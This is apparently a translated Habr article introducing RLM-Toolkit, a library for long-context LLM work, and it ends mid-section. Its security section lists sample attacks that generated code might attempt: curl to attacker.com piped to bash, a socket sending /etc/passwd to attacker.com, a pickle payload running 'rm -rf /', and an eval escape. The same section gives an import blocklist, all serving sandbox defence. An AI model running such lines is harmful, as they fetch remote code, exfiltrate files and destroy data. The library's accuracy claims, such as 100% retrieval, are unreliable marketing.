From theory to production: architecture, algorithms, security
Hi, Habr!
This is a comprehensive guide to RLM-Toolkit, an open-source library for working with contexts of arbitrary length.
What this article covers:
Formal RLM theory (state machine, recursion)
InfiniRetri: the math of attention-based retrieval
H-MEM: a cognitive memory architecture
RAG vs KAG vs GraphRAG vs InfiniRetri
Security: CIRCLE compliance, sandbox escape prevention
Real examples with execution logs
Troubleshooting and best practices
Target audience: from middle engineers to PhD-level research.
pip install rlm-toolkit
On the roadmap: integration with NVIDIA KVzap for hardware-accelerated KV-cache compression.
The problem: Context Rot and the math of degradation
Theory: a formal definition of RLM
InfiniRetri: architecture and algorithms
RAG vs KAG vs GraphRAG vs InfiniRetri
H-MEM: cognitive hierarchical memory
Self-Evolving: R-Zero and REBASE
Security Suite: CIRCLE compliance
Providers: a comparative analysis
Practice: complete examples with logs
Troubleshooting
Conclusion and arXiv links
| Model | Context | Effective | Decay λ | Source |
|---|---|---|---|---|
| GPT-4o | 128K | ~80K | 0.012 | OpenAI |
| GPT-OSS-120B | 128K | ~100K | 0.010 | OpenAI |
| Claude Sonnet 4.5 | 200K | ~150K | 0.010 | Anthropic |
| Claude Opus 4.5 | 200K | ~180K | 0.008 | Anthropic |
| Gemini 3 Pro | 2M | ~1.5M | 0.003 | Google |
| Gemini 3 Flash | 1M | ~800K | 0.004 | Google |
| Llama 4 Scout | 10M | ~8M | 0.001 | Meta |
| Qwen3-235B | 128K | ~100K | 0.011 | Alibaba |
Quality(c) = Q₀ × e^(−λc) + ε

where:
Q₀ = the model's base quality (as c → 0)
λ = degradation coefficient (model-specific)
c = context length in tokens
ε = noise (hallucination baseline)
Why is the decay exponential? Attention in transformers scales as O(n²). As the context grows:
Attention weights get spread across a larger number of tokens
Important information "drowns" in the mass
Positional encoding loses precision at distant positions
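To make the decay model concrete, here is a small numeric sketch. One caveat: for the λ values in the table above to produce sensible numbers, λ has to be read as a rate per 1,000 tokens (with c in raw tokens, e^(−λc) underflows immediately). That unit assumption, and the helper itself, are mine, not the toolkit's.

import math

# Decay coefficients λ from the table above (assumed to be per 1K tokens)
DECAY = {"GPT-4o": 0.012, "Claude Opus 4.5": 0.008, "Gemini 3 Pro": 0.003}

def quality(c_k_tokens: float, q0: float = 1.0, lam: float = 0.01,
            eps: float = 0.02) -> float:
    """Quality(c) = Q0 * e^(-λc) + ε, with c in thousands of tokens."""
    return q0 * math.exp(-lam * c_k_tokens) + eps

for model, lam in DECAY.items():
    print(f"{model}: quality at 128K tokens ≈ {quality(128, lam=lam):.2f}")
# GPT-4o retains ≈0.24 of base quality at 128K; Gemini 3 Pro retains ≈0.70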
Tests on OOLONG-Pairs (arxiv:2512.24601):
| Context | NIAH (simple) | OOLONG-Pairs (complex) |
|---|---|---|
| 8K | 98% | 72% |
| 32K | 97% | 58% |
| 128K | 95% | 31% |
| 512K | 91% | 8% |
| 1M | 89% | <0.1% 😱 |
OOLONG-Pairs is a task of comparing pairs of entities scattered across a document. It requires global understanding, not local lookup.
Chunking:
chunks = split(document, size=100_000)
results = [llm.analyze(chunk) for chunk in chunks]
final = merge(results)
# ❌ PROBLEM: cross-chunk references are lost
# If fact A is in chunk 1 and fact B is in chunk 5, the link is never found
Summarization:
summary = llm.summarize(document)      # 10M → 10K
answer = llm.query(summary, question)
# ❌ PROBLEM: details are lost irreversibly
# "The contract has 847 clauses" → "A detailed contract"
RAG:
relevant = vectordb.search(query, k=10)
answer = llm.generate(query, relevant)
# ❌ PROBLEM: semantic similarity ≠ relevance
# "Find the contradictions": which embedding would you even search for?
┌────────────────────────────────────────────────────────────────┐
│                       RLM ARCHITECTURE                         │
├────────────────────────────────────────────────────────────────┤
│                                                                │
│  ┌──────────────────────────────────────────────────────────┐ │
│  │                      INPUT LAYER                         │ │
│  │  context = "10M tokens..."      query = "Find bugs"      │ │
│  └──────────────────────────────────────────────────────────┘ │
│                             ↓                                  │
│  ┌──────────────────────────────────────────────────────────┐ │
│  │               REPL ENVIRONMENT (Python)                  │ │
│  │  Variables: {context, vars, history}                     │ │
│  │  Functions: {llm_query, FINAL, FINAL_VAR}                │ │
│  └──────────────────────────────────────────────────────────┘ │
│                             ↓                                  │
│  ┌──────────────────────────────────────────────────────────┐ │
│  │                 ROOT LLM (Controller)                    │ │
│  │  Generates Python code to analyze context                │ │
│  │  Makes decisions about sub-calls                         │ │
│  └──────────────────────────────────────────────────────────┘ │
│            ↓                            ↓                      │
│  ┌─────────────────┐      ┌─────────────────────────┐         │
│  │  CODE EXECUTOR  │      │      SUB-LLM CALLS      │         │
│  │  (Sandboxed)    │      │  llm_query(prompt)      │         │
│  │  AST validation │      │  depth++, budget--      │         │
│  └─────────────────┘      └─────────────────────────┘         │
│            ↓                            ↓                      │
│  ┌──────────────────────────────────────────────────────────┐ │
│  │                     STATE UPDATE                         │ │
│  │  vars.update(new_vars)                                   │ │
│  │  history.append(output)                                  │ │
│  └──────────────────────────────────────────────────────────┘ │
│                             ↓                                  │
│                  FINAL(answer) → OUTPUT                        │
│                                                                │
└────────────────────────────────────────────────────────────────┘
Definition 1. A Recursive Language Model (RLM) is a tuple (L, E, R, S, δ, F), where:
L : Language Model (root LLM)
E : Execution Environment (Python REPL)
R : Recursive mechanism (llm_query function)
S : State space = {context, vars, history, depth, cost}
δ : Transition function S × Action → S
F : Termination predicate (FINAL detected)
State = (context: str, vars: Dict, history: List, depth: int, cost: float)

Actions:
- CODE(c)     : Execute code c, update vars
- QUERY(p)    : Call sub-LLM with prompt p, depth++
- FINAL(x)    : Terminate with output x
- FINAL_VAR(v): Terminate with vars[v]

Transitions:

S₀ = (P, {}, [], 0, 0.0)   # Initial state

δ(S, CODE(c)):
    output = execute(c, S.vars)
    return S with {
        vars    = S.vars ∪ new_vars(output),
        history = S.history + [output]
    }

δ(S, QUERY(p)):
    result = sub_llm.generate(p)
    return S with {
        vars    = S.vars ∪ {"last_query": result},
        history = S.history + [result],
        depth   = S.depth + 1,
        cost    = S.cost + query_cost(p, result)
    }

δ(S, FINAL(x)):
    HALT with output x
Context Never Loaded: context exists as a variable but is never fed into the LLM in full
Depth Bounded: depth ≤ max_depth (typically 2-3)
Cost Bounded: cost ≤ max_cost (a budget in USD)
Termination Guaranteed: either FINAL or max_iterations
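A minimal sketch of the driver loop that enforces these guarantees (schematic Python under assumed interfaces: root_llm.next_action, a sandboxed execute, and estimate_cost are placeholders, not the toolkit's API):

from dataclasses import dataclass, field

@dataclass
class State:
    context: str
    vars: dict = field(default_factory=dict)
    history: list = field(default_factory=list)
    depth: int = 0
    cost: float = 0.0

MAX_DEPTH, MAX_COST, MAX_ITERATIONS = 3, 5.0, 50

def run_rlm(state: State, root_llm, sub_llm):
    """Drive δ : S × Action → S until FINAL fires or a bound trips."""
    for _ in range(MAX_ITERATIONS):
        action = root_llm.next_action(state)        # CODE / QUERY / FINAL
        if action.kind == "FINAL":
            return action.payload                   # termination predicate F
        if action.kind == "CODE":
            output = execute(action.payload, state.vars)  # sandboxed (assumed)
            state.history.append(output)
        elif action.kind == "QUERY":
            if state.depth >= MAX_DEPTH or state.cost >= MAX_COST:
                break                               # Depth/Cost Bounded invariants
            result = sub_llm.generate(action.payload)
            state.vars["last_query"] = result
            state.history.append(result)
            state.depth += 1
            state.cost += estimate_cost(action.payload, result)
    raise RuntimeError("No FINAL within max_iterations")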
# Query: "Найди все SQL-инъекции в коде" # Iteration 1: Root LLM generates code """ sections = context.split("\\n\\n# FILE:") print(f"Found {len(sections)} files") sql_patterns = ["execute(", "cursor.execute", "raw("] suspicious = [] for i, section in enumerate(sections): if any(p in section for p in sql_patterns): suspicious.append(i) print(f"Suspicious files: {suspicious}") """ # Output: "Found 47 files\nSuspicious files: [3, 12, 29, 45]" # Iteration 2: Deep analysis via sub-LLM """ for idx in suspicious[:3]: # Analyze first 3 file_content = sections[idx][:8000] # Truncate for sub-call analysis = llm_query(f''' Analyze this code for SQL injection vulnerabilities: {file_content} ''') print(f"File {idx}: {analysis}") """ # Output: "File 3: VULNERABLE - unsanitized user input at line 42..." # Iteration 3: Compile results """ vulnerabilities = [ {"file": 3, "line": 42, "type": "SQL Injection"}, {"file": 12, "line": 87, "type": "SQL Injection"}, # ... ] FINAL_VAR(vulnerabilities) """
Query: "Найди все упоминания дедлайна" Vector Search: 1. Embed query → q_vec 2. For each chunk: similarity(q_vec, chunk_vec) 3. Return top-k ПРОБЛЕМА: "deadline" может быть написан как: - "крайний срок" - "до 15 января" - "не позднее первого квартала" Vector similarity НЕ ПОНИМАЕТ семантику!
LLM уже "знает", на какие токены обращать внимание для ответа на вопрос. Мы просто извлекаем эту информацию.
def infiniretri(context: str, question: str, model: LLM) -> str:
    """
    Attention-Based Infinite Context Retrieval
    Based on arxiv:2502.12962
    """
    # Step 1: Chunk context into segments
    segments = chunk(context, size=SEGMENT_SIZE)  # e.g., 8K tokens each

    # Step 2: Initialize historical context
    historical_context = ""

    # Step 3: Iterative processing (like human reading)
    for segment in segments:
        # Combine historical context + current segment
        combined = historical_context + segment

        # Run model with question to get attention
        output, attention_weights = model.forward_with_attention(
            prompt=f"Context: {combined}\n\nQuestion: {question}"
        )

        # Step 4: Attention-based retrieval
        # Average attention across layers and heads
        avg_attention = attention_weights.mean(dim=[0, 1])  # [seq_len]

        # Find tokens with highest attention
        top_indices = avg_attention.topk(k=TOP_K).indices

        # Step 5: Update historical context
        # Keep only high-attention tokens from combined
        relevant_tokens = [combined[i] for i in top_indices]
        historical_context = "".join(relevant_tokens)

    # Step 6: Final answer with preserved context
    return model.generate(
        f"Context: {historical_context}\n\nQuestion: {question}\n\nAnswer:"
    )
Attention Score Aggregation:
A_final = (1/L) × Σ_{l=1}^{L} (1/H) × Σ_{h=1}^{H} A_{l,h}

where:
L = number of layers
H = number of heads per layer
A_{l,h} = attention matrix at layer l, head h
Token Importance Score:
importance(t) = Σ_{q ∈ query_tokens} A_final[q, t]
Tokens with high importance are kept in the historical context.
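For reference, this aggregation is straightforward to express in PyTorch. A sketch of the two formulas above, assuming attentions is the per-layer tuple that Hugging Face models return when called with output_attentions=True (illustrative, not InfiniRetri's actual code):

import torch

def token_importance(attentions: tuple, query_token_ids: torch.Tensor) -> torch.Tensor:
    """
    attentions: L tensors of shape [batch, heads, seq_len, seq_len]
    Returns importance(t) = Σ_{q ∈ query tokens} A_final[q, t].
    """
    stacked = torch.stack(attentions)         # [L, batch, H, S, S]
    a_final = stacked.mean(dim=(0, 2))[0]     # mean over layers and heads -> [S, S]
    return a_final[query_token_ids].sum(dim=0)  # attention each token receives from the query

# Usage: keep the top-K highest-importance tokens in the historical context
# top_ids = token_importance(attn, q_ids).topk(k=64).indices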
| Benchmark | Baseline LLM | + RAG | + InfiniRetri |
|---|---|---|---|
| NIAH @1M | 23% | 61% | 100% |
| LongBench | 31% | 51% | 89% (+187%) |
| SCROLLS | 44% | 58% | 82% |
| Quality | 29% | 47% | 71% |
from rlm_toolkit.retrieval import InfiniRetriever

# Initialize with small model for efficiency (default: Qwen2.5-0.5B)
retriever = InfiniRetriever(
    model_name_or_path="Qwen/Qwen2.5-0.5B-Instruct",
)

# Load massive document
with open("codebase_1m_tokens.txt") as f:
    huge_doc = f.read()

# Retrieve with 100% accuracy
answer = retriever.retrieve(
    context=huge_doc,
    question="Which function defines SecurityEngine?"
)

print(answer)
# Output: "SecurityEngine is defined in engines/base.py,
#          in create_engine() at line 142"
| Aspect | RAG | KAG | GraphRAG | InfiniRetri |
|---|---|---|---|---|
| Approach | Vector similarity | Knowledge Graph | Community detection | Attention-based |
| Indexing | Embedding + VectorDB | Entity extraction + Graph | Summarization + Leiden | None (runtime) |
| Indexing time | Minutes | Hours | Hours | 0 |
| Requirements | Embedding model | Graph DB + LLM | LLM + lots of $$ | Attention access |
| Global context | ❌ | ✅ | ✅ | ✅ |
| Exact search | ~70% | ~85% | ~80% | 100% |
| Cost | $ | $$$ | $$$$ | $ |
| Open Source | ✅ | ✅ | ✅ | ✅ |
┌─────────────────────────────────────────────────────────────────┐
│                         DECISION TREE                           │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  Context < 50K tokens?                                          │
│  └─ YES → Standard RAG (cheap, simple)                          │
│  └─ NO ↓                                                        │
│                                                                 │
│  Need structured relationships?                                 │
│  └─ YES → KAG (medicine, law, finance)                          │
│  └─ NO ↓                                                        │
│                                                                 │
│  Need a global overview of a large corpus?                      │
│  └─ YES → GraphRAG (research, due diligence)                    │
│  └─ NO ↓                                                        │
│                                                                 │
│  Is retrieval precision critical?                               │
│  └─ YES → InfiniRetri (code, legal, security)                   │
│  └─ NO ↓                                                        │
│                                                                 │
│  Context > 500K tokens?                                         │
│  └─ YES → RLM + InfiniRetri                                     │
│  └─ NO → RAG is enough                                          │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
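The same tree, encoded as a small helper function (illustrative only; the function and its flags are hypothetical, not part of rlm_toolkit):

def choose_retrieval(context_tokens: int,
                     needs_structured_links: bool = False,
                     needs_global_overview: bool = False,
                     needs_exact_search: bool = False) -> str:
    """Walk the decision tree above and return a method name."""
    if context_tokens < 50_000:
        return "RAG"                   # cheap and simple
    if needs_structured_links:
        return "KAG"                   # medicine, law, finance
    if needs_global_overview:
        return "GraphRAG"              # research, due diligence
    if needs_exact_search:
        return "InfiniRetri"           # code, legal, security
    if context_tokens > 500_000:
        return "RLM + InfiniRetri"
    return "RAG"

choose_retrieval(2_000_000, needs_exact_search=True)   # -> "InfiniRetri"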
RAG + InfiniRetri (Hybrid Retrieval):
from rlm_toolkit.retrieval import HybridRetriever, VectorRetriever, InfiniRetriever

hybrid = HybridRetriever(
    retrievers=[
        VectorRetriever(model="BAAI/bge-m3", weight=0.3),
        InfiniRetriever(model="Qwen/Qwen3-0.6B", weight=0.7),
    ],
    fusion="reciprocal_rank"  # RRF fusion
)

# Fast vector pre-filter + precise attention refinement
results = hybrid.retrieve(context, question)
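The fusion="reciprocal_rank" option refers to Reciprocal Rank Fusion (RRF). A generic sketch of how RRF merges ranked lists (the standard algorithm, not necessarily the toolkit's exact implementation; k=60 is the conventional constant):

from collections import defaultdict

def reciprocal_rank_fusion(rankings: list[list[str]], k: int = 60) -> list[str]:
    """Merge ranked lists: score(d) = Σ_i 1 / (k + rank_i(d))."""
    scores = defaultdict(float)
    for ranking in rankings:
        for rank, doc_id in enumerate(ranking, start=1):
            scores[doc_id] += 1.0 / (k + rank)
    return sorted(scores, key=scores.get, reverse=True)

# e.g., fuse a vector-search ranking with an attention-based ranking
reciprocal_rank_fusion([["d3", "d1", "d7"], ["d3", "d9", "d1"]])
# -> ["d3", "d1", "d9", "d7"]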
KAG + InfiniRetri (Graph-Enhanced):
from rlm_toolkit.retrieval import KAGRetriever, InfiniRetriever

# Step 1: KAG finds relevant entities
kag = KAGRetriever(graph_db="neo4j://localhost:7687")
entities = kag.query("All contracts with Gazprom")

# Step 2: InfiniRetri finds exact mentions
infini = InfiniRetriever("Qwen/Qwen3-0.6B")
for entity in entities:
    details = infini.retrieve(
        context=full_document,
        question=f"Details about {entity.name}"
    )
| Method | Indexing | Query | Total (100 queries) |
|---|---|---|---|
| RAG (OpenAI) | $0.13 | $0.02 | $2.13 |
| KAG (GPT-4o) | $15.00 | $0.50 | $65.00 |
| GraphRAG | $50.00 | $0.10 | $60.00 |
| InfiniRetri | $0.00 | $0.05 | $5.00 |
| RLM + InfiniRetri | $0.00 | $0.30 | $30.00 |
# LangChain ConversationBufferMemory
class BufferMemory:
    def __init__(self, max_tokens=4000):
        self.buffer = []
        self.max_tokens = max_tokens

    def add(self, message):
        self.buffer.append(message)
        # FIFO eviction
        while token_count(self.buffer) > self.max_tokens:
            self.buffer.pop(0)  # ❌ Old = lost forever
Problems:
FIFO eviction: important old information is evicted before unimportant new information
No abstraction: "we discussed Python yesterday" and its details sit at the same level
No links: conversations are isolated
H-MEM is based on Complementary Learning Systems (CLS) theory:

HIPPOCAMPUS (fast memorization)
    ↓ consolidation
NEOCORTEX (long-term storage, abstractions)
The four levels of H-MEM:
┌─────────────────────────────────────────────────────────────────┐
│ LEVEL 3: DOMAIN                                                 │
│ "The user is a developer interested in AI Security"             │
│ Changes very rarely, high abstraction                           │
├─────────────────────────────────────────────────────────────────┤
│ LEVEL 2: CATEGORY                                               │
│ "Topic: weather", "Topic: code", "Topic: documentation"         │
│ Semantic clusters                                               │
├─────────────────────────────────────────────────────────────────┤
│ LEVEL 1: TRACE                                                  │
│ "Discussed the weather in Moscow and St. Petersburg,            │
│  prefers +20°C"                                                 │
│ Consolidated memories                                           │
├─────────────────────────────────────────────────────────────────┤
│ LEVEL 0: EPISODE                                                │
│ "User: what's the weather?"  "AI: +15°C, cloudy"                │
│ Raw interactions                                                │
└─────────────────────────────────────────────────────────────────┘
# (uses sklearn-style HDBSCAN/KMeans; Trace, Category, now() defined elsewhere)
class HierarchicalMemory:
    def consolidate(self):
        """
        Memory consolidation:
        Episodes → Traces → Categories → Domains
        """
        # Step 1: Cluster episodes by semantic similarity
        episode_embeddings = self.embed(self.episodes)
        clusters = HDBSCAN(min_cluster_size=3).fit(episode_embeddings)

        # Step 2: Create traces via LLM summarization
        for cluster_id in set(clusters.labels_):
            if cluster_id == -1:  # Noise
                continue
            cluster_episodes = [
                self.episodes[i]
                for i, c in enumerate(clusters.labels_)
                if c == cluster_id
            ]
            trace = self.llm.summarize(
                f"Summarize these interactions:\n{cluster_episodes}"
            )
            self.traces.append(Trace(
                content=trace,
                source_episodes=cluster_episodes,
                timestamp=now()
            ))

        # Step 3: Cluster traces → categories
        if len(self.traces) >= 5:
            trace_embeddings = self.embed([t.content for t in self.traces])
            trace_clusters = KMeans(
                n_clusters=min(5, len(self.traces) // 3)
            ).fit(trace_embeddings)
            for cluster_id in range(trace_clusters.n_clusters):
                cluster_traces = [
                    self.traces[i]
                    for i, c in enumerate(trace_clusters.labels_)
                    if c == cluster_id
                ]
                category = self.llm.summarize(
                    f"What category do these belong to?\n{cluster_traces}"
                )
                self.categories.append(Category(content=category))

        # Step 4: Update domain (rarely)
        if len(self.categories) >= 3 and self._should_update_domain():
            self.domain = self.llm.generate(
                f"Based on categories {self.categories}, "
                f"describe the user's overall interests and profile."
            )
What if new information contradicts old information?
def add_episode_with_conflict_check(self, new_episode: str):
    """
    Check for conflicts and update memories accordingly.
    """
    # Find potentially conflicting memories
    similar = self.retrieve(new_episode, k=5)

    for memory in similar:
        conflict = self.llm.check_conflict(
            f"Old: {memory.content}\nNew: {new_episode}"
        )
        if conflict.is_conflict:
            if conflict.new_supersedes:
                # Update the old memory
                memory.content = self.llm.merge(
                    f"Update '{memory.content}' with '{new_episode}'"
                )
                memory.updated_at = now()
            else:
                # Flag for human review
                self.conflicts.append(Conflict(old=memory, new=new_episode))

    self.episodes.append(Episode(content=new_episode))
import os

from rlm_toolkit.memory import SecureHierarchicalMemory
from rlm_toolkit.crypto import AES256GCM

# Create encrypted memory with trust zones
smem = SecureHierarchicalMemory(
    agent_id="agent-financial",
    trust_zone="confidential",
    encryption=AES256GCM(key=os.environ["HMEM_KEY"]),
)

# Add sensitive data (encrypted at rest)
smem.add_episode("Client SSN: 123-45-6789")  # Encrypted!

# Other agents cannot access it
other_agent = SecureHierarchicalMemory(agent_id="agent-public")
try:
    other_agent.retrieve("SSN")  # ❌ AccessDenied
except AccessDenied:
    pass

# Grant explicit access
smem.grant_access("agent-compliance", "confidential")
compliance_agent = SecureHierarchicalMemory(agent_id="agent-compliance")
compliance_agent.retrieve("SSN")  # ✅ Works
The LLM generates tasks for itself → solves them → improves. No labeled data, no human feedback.
Based on:
R-Zero (arxiv:2508.05004): Challenger-Solver co-evolution
REBASE (arxiv:2512.29379): experience replay with scoring
┌─────────────────────────────────────────────────────────────────┐
│                          R-ZERO LOOP                            │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│   ┌───────────────┐         ┌───────────────┐                   │
│   │  CHALLENGER   │ ──────→ │    SOLVER     │                   │
│   │  Generates    │         │   Attempts    │                   │
│   │  hard tasks   │         │   to solve    │                   │
│   └───────────────┘         └───────────────┘                   │
│          ↑                          ↓                           │
│          │                  ┌───────────────┐                   │
│          │                  │   VERIFIER    │                   │
│          │                  │   Checks if   │                   │
│          │                  │   correct     │                   │
│          │                  └───────────────┘                   │
│          │                          │                           │
│          │            ┌─────────────┴─────────────┐             │
│          │            ↓                           ↓             │
│          │      ┌──────────┐                ┌──────────┐        │
│          │      │ CORRECT  │                │  WRONG   │        │
│          │      │ +reward  │                │ -reward  │        │
│          │      └──────────┘                └──────────┘        │
│          │            │                           │             │
│          │            └───────────┬───────────────┘             │
│          │                        ↓                             │
│          │              ┌─────────────────┐                     │
│          └───────────── │ EVOLUTION POOL  │                     │
│                         │ Best strategies │                     │
│                         └─────────────────┘                     │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
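Schematically, one turn of the loop can be written like this (illustrative Python; challenger, solver, verifier, and pool are assumed interfaces; the real toolkit API is shown next):

def r_zero_step(challenger, solver, verifier, pool, difficulty: float) -> float:
    """One Challenger/Solver/Verifier round; returns the new difficulty."""
    task = challenger.generate(difficulty=difficulty)
    attempt = solver.solve(task)
    correct = verifier.check(task, attempt)
    reward = 1.0 if correct else -1.0
    solver.update(task, attempt, reward)   # reinforce or penalize the strategy
    if correct:
        pool.append((task, attempt))       # evolution pool keeps what worked
        difficulty += 0.1                  # ramp difficulty (cf. difficulty_ramp)
    return difficulty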
from rlm_toolkit.evolve import SelfEvolvingRLM, EvolutionStrategy
from rlm_toolkit.providers import OllamaProvider

# Initialize
evolve = SelfEvolvingRLM(
    provider=OllamaProvider("llama4-scout:17b"),
    strategy=EvolutionStrategy.CHALLENGER_SOLVER,
    config={
        "challenge_diversity": 0.8,  # How different each challenge is
        "difficulty_ramp": 0.1,      # How fast difficulty increases
        "memory_size": 1000,         # Experience buffer size
    }
)

# Single solve with self-refinement
answer = evolve.solve("Prove that √2 is irrational")
print(f"Answer: {answer.answer}")
print(f"Confidence: {answer.confidence}")
print(f"Iterations: {answer.iterations}")

# Training loop (improves over time)
metrics = evolve.training_loop(
    iterations=100,
    domain="math",
    difficulty="hard",
    save_checkpoint=True,
)
print(f"Initial success rate: {metrics.initial_rate}")  # e.g., 65%
print(f"Final success rate: {metrics.final_rate}")      # e.g., 89%
print(f"Best strategies: {metrics.top_strategies}")
from rlm_toolkit.evolve import REBASE

rebase = REBASE(
    provider=OllamaProvider("llama4-scout:109b"),
    scorer="outcome",  # Score by final outcome
)

# Collect experiences
for task in tasks:
    trajectory = rebase.solve_with_trajectory(task)
    rebase.add_experience(trajectory)

# Train on best experiences
improved = rebase.train(
    epochs=10,
    batch_size=32,
    top_k_ratio=0.2,  # Use top 20% of trajectories
)
# The LLM might generate:

# 1. RCE via subprocess
import subprocess
subprocess.run(["curl", "attacker.com/shell.sh", "|", "bash"])

# 2. Data exfiltration via network
import socket
s = socket.socket()
s.connect(("attacker.com", 4444))
s.send(open("/etc/passwd").read().encode())

# 3. Pickle RCE
import os, pickle
class Exploit:
    def __reduce__(self):
        return (os.system, ("rm -rf /",))
pickle.loads(pickle.dumps(Exploit()))

# 4. Builtins escape
eval("__import__('os').system('whoami')")
CIRCLE = Code Injection for RLM via Crafted Linguistic Exploits
It tests seven attack categories:
Direct code injection
Obfuscated code injection
Indirect injection via context
Memory corruption attempts
Privilege escalation
Data exfiltration
Denial of service
┌─────────────────────────────────────────────────────────────────┐
│                        SECURITY LAYERS                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  Layer 1: AST STATIC ANALYSIS                                   │
│  ─────────────────────────────                                  │
│  Before execution, parse code to AST and check:                 │
│  - Import statements against blocklist                          │
│  - Function calls against dangerous patterns                    │
│  - Attribute access (__builtins__, __globals__)                 │
│                                                                 │
│  Layer 2: IMPORT BLOCKLIST (38 modules)                         │
│  ─────────────────────────────────────                          │
│  os, sys, subprocess, shutil, pathlib,                          │
│  socket, http, urllib, ftplib, telnetlib, requests,             │
│  pickle, shelve, dill, cloudpickle, marshal,                    │
│  ctypes, cffi, multiprocessing, threading,                      │
│  code, codeop, pty, tty, termios,                               │
│  tempfile, glob, fnmatch, webbrowser, platform,                 │
│  asyncio (subprocess), importlib, builtins                      │
│                                                                 │
│  Layer 3: SANDBOXED EXECUTION                                   │
│  ─────────────────────────────                                  │
│  - Restricted builtins (no eval, exec, compile, open)           │
│  - Timeout enforcement (default 30s)                            │
│  - Memory limit (default 512MB)                                 │
│  - Virtual filesystem with quotas                               │
│                                                                 │
│  Layer 4: OUTPUT SANITIZATION                                   │
│  ─────────────────────────────                                  │
│  - Truncate output to prevent context overflow                  │
│  - Scan for sensitive data patterns (API keys, passwords)       │
│  - Redact before returning to user                              │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
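To give Layer 1 some flavor, here is a minimal AST-based validator built on Python's ast module. It is an illustrative sketch with a truncated blocklist, not the toolkit's actual validator:

import ast

class SecurityError(Exception):
    pass

BLOCKED_IMPORTS = {"os", "sys", "subprocess", "socket", "pickle", "ctypes"}  # excerpt of the 38
BLOCKED_CALLS = {"eval", "exec", "compile", "open", "__import__"}
BLOCKED_ATTRS = {"__builtins__", "__globals__", "__subclasses__"}

def validate(code: str) -> None:
    """Raise SecurityError before execution if the code trips the blocklist."""
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            bad = {a.name.split(".")[0] for a in node.names} & BLOCKED_IMPORTS
            if bad:
                raise SecurityError(f"blocked import: {bad}")
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in BLOCKED_IMPORTS:
                raise SecurityError(f"blocked import: {node.module}")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in BLOCKED_CALLS:
                raise SecurityError(f"blocked call: {node.func.id}")
        elif isinstance(node, ast.Attribute) and node.attr in BLOCKED_ATTRS:
            raise SecurityError(f"blocked attribute access: {node.attr}")

validate("__import__('os').system('whoami')")  # raises SecurityError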
from rlm_toolkit import RLM, RLMConfig, SecurityConfig

# Maximum security configuration
config = RLMConfig(
    security=SecurityConfig(
        sandbox=True,
        max_execution_time=30.0,
        max_memory_mb=512,
        blocked_imports="strict",  # All 38 modules
        allow_network=False,
        allow_filesystem=False,
        virtual_fs_quota_mb=100,
        redact_sensitive=True,
        sensitive_patterns=[
            r"[A-Za-z0-9]{32}",    # API keys
            r"password\s*[:=]",    # Passwords
            r"\d{3}-\d{2}-\d{4}",  # SSN
        ],
    )
)

rlm = RLM.from_ollama("llama4-scout:17b", config=config)

# This is now safe
result = rlm.run(untrusted_document, "Analyze this")
================================ test session starts ================================
collected 27 items

tests/security/test_blocked_imports.py::test_os_blocked PASSED
tests/security/test_blocked_imports.py::test_subprocess_blocked PASSED
tests/security/test_blocked_imports.py::test_socket_blocked PASSED
tests/security/test_blocked_imports.py::test_pickle_blocked PASSED
tests/security/test_blocked_imports.py::test_ctypes_blocked PASSED
tests/security/test_sandbox.py::test_timeout_enforcement PASSED
tests/security/test_sandbox.py::test_memory_limit PASSED
tests/security/test_sandbox.py::test_builtins_restricted PASSED
tests/security/test_sandbox.py::test_eval_blocked PASSED
tests/security/test_sandbox.py::test_exec_blocked PASSED
tests/security/test_exfiltration.py::test_network_blocked PASSED
tests/security/test_exfiltration.py::test_file_read_blocked PASSED
tests/security/test_obfuscation.py::test_base64_decode_blocked PASSED
tests/security/test_obfuscation.py::test_hex_decode_blocked PASSED
tests/security/test_obfuscation.py::test_rot13_blocked PASSED
tests/security/test_indirect.py::test_context_injection_blocked PASSED
tests/security/test_indirect.py::test_prompt_injection_detected PASSED
tests/security/test_builtins.py::test_globals_access_blocked PASSED
tests/security/test_builtins.py::test_builtins_access_blocked PASSED
tests/security/test_builtins.py::test_subclasses_blocked PASSED
tests/security/test_vfs.py::test_quota_enforcement PASSED
tests/security/test_vfs.py::test_path_traversal_blocked PASSED
tests/security/test_redaction.py::test_api_key_redacted PASSED
tests/security/test_redaction.py::test_password_redacted PASSED
tests/security/test_redaction.py::test_ssn_redacted PASSED
tests/security/test_circle.py::test_circle_benchmark_passed PASSED
tests/security/test_circle.py::test_all_attack_categories_blocked PASSED

================================ 27 passed in 12.34s ================================
| Category | Providers |
|---|---|
| Cloud API | OpenAI, Anthropic, Google, Mistral, Cohere, AI21 |
| Inference API | Together, Fireworks, Groq, Hyperbolic, Anyscale |
| Local | Ollama, vLLM, llama.cpp, LM Studio, LocalAI |
| Enterprise | Azure OpenAI, AWS Bedrock, GCP Vertex AI |
| Provider | Model | Context | Code Gen | Speed | Cost/1M tok |
|---|---|---|---|---|---|
| OpenAI | GPT-4o | 128K | ⭐⭐⭐⭐ | Fast | $5 |
| OpenAI | GPT-OSS-120B | 128K | ⭐⭐⭐⭐ | Fast | $3 |
| Anthropic | Claude Opus 4.5 | 200K | ⭐⭐⭐⭐⭐ | Medium | $15 |
| Anthropic | Claude Sonnet 4.5 | 200K | ⭐⭐⭐⭐⭐ | Fast | $3 |
| Google | Gemini 3 Pro | 2M | ⭐⭐⭐⭐ | Fast | $1.25 |
| Google | Gemini 3 Flash | 1M | ⭐⭐⭐⭐ | Very Fast | $0.08 |
| Meta | Llama 4 Scout | 10M | ⭐⭐⭐⭐ | Varies | Free |
| Alibaba | Qwen3-235B | 128K | ⭐⭐⭐⭐ | Fast | $0.50 |
| Mistral | Large 3 | 128K | ⭐⭐⭐⭐ | Fast | $2 |
💰 Budget-First:
from rlm_toolkit import RLM, RLMConfig

# Use factory methods for easy setup
rlm = RLM.from_ollama("llama4-scout")  # 100% free, local
# Cost: $0 per 10M-token analysis
🏆 Quality-First:
# Claude for best code generation
rlm = RLM.from_anthropic(
    root_model="claude-opus-4.5",
    sub_model="claude-haiku",
)
# Cost: ~$8 per 10M-token analysis
🔒 Privacy-First (100% Local):
